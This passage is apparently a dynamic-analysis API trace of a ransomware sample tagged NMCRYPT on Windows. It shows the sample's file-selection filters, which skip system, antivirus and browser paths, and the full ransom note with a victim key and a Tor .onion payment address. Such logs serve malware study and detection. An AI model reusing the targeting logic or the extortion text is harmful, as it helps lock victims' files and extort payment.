(_String1="sr-Latn-CS", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="sr-Latn-RS", _String2=".") returned 1 [0148.073] wcscmp (_String1="sr-Latn-RS", _String2="..") returned 1 [0148.073] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.073] wcscmp (_String1="sv-SE", _String2=".") returned 1 [0148.073] wcscmp (_String1="sv-SE", _String2="..") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="TabIpsps.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="TabIpsps.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="TabIpsps.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="TabIpsps.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="tabskb.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="tabskb.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="tabskb.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="tabskb.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="TabTip.exe", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="TabTip.exe", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="TabTip.exe", pszSpec="*.exe") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] wcscmp (_String1="th-TH", _String2=".") returned 1 [0148.074] wcscmp (_String1="th-TH", _String2="..") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="TipRes.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="TipRes.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="TipRes.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="TipRes.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="tipresx.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="tipresx.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="tipresx.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="tipresx.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="tipskins.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="tipskins.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="tipskins.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="tipskins.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="tiptsf.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="tiptsf.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="tiptsf.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="tiptsf.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] PathMatchSpecW (pszFile="tpcps.dll", pszSpec="*NMCRYPT") returned 0 [0148.074] PathMatchSpecW (pszFile="tpcps.dll", pszSpec="*Recovers your files.html") returned 0 [0148.074] PathMatchSpecW (pszFile="tpcps.dll", pszSpec="*.exe") returned 0 [0148.074] PathMatchSpecW (pszFile="tpcps.dll", pszSpec="*.dll") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] wcscmp (_String1="tr-TR", _String2=".") returned 1 [0148.074] wcscmp (_String1="tr-TR", _String2="..") returned 1 [0148.074] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.074] wcscmp (_String1="uk-UA", _String2=".") returned 1 [0148.074] wcscmp (_String1="uk-UA", _String2="..") returned 1 [0148.075] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.075] wcscmp (_String1="zh-CN", _String2=".") returned 1 [0148.075] wcscmp (_String1="zh-CN", _String2="..") returned 1 [0148.075] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.075] wcscmp (_String1="zh-HK", _String2=".") returned 1 [0148.075] wcscmp (_String1="zh-HK", _String2="..") returned 1 [0148.075] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0148.075] wcscmp (_String1="zh-TW", _String2=".") returned 1 [0148.075] wcscmp (_String1="zh-TW", _String2="..") returned 1 [0148.075] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0 [0148.075] GetLastError () returned 0x12 [0148.075] FindClose (in: hFindFile=0x8be838 | out: hFindFile=0x8be838) returned 1 [0148.075] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.075] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.076] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.076] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.076] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.076] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.076] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.076] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.076] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.076] wcslen (_String="\\\\?\\") returned 0x4 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.exe") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.dll") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.lnk") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.bat") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.ini") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.msi") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*.scf") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*pagefile.sys*") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*AppData*") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\winrar\\*") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\java\\*") returned 0 [0148.076] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\windows\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\ESET\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\AVG\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*Atheros*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*Realtek*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*bootmgr*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*boot*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*boot*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*IO.SYS*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*ntldr*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*chrome*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*opera*") returned 0 [0148.077] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", pszSpec="*firefox*") returned 0 [0148.077] wcslen (_String="\\\\?\\") returned 0x4 [0148.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1f8 [0148.077] wcscmp (_String1=".", _String2=".") returned 0 [0148.077] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.077] wcscmp (_String1="..", _String2=".") returned 1 [0148.077] wcscmp (_String1="..", _String2="..") returned 0 [0148.077] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.077] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.078] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.078] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.078] strlen (_Str="NMoreira") returned 0x8 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.078] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.079] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 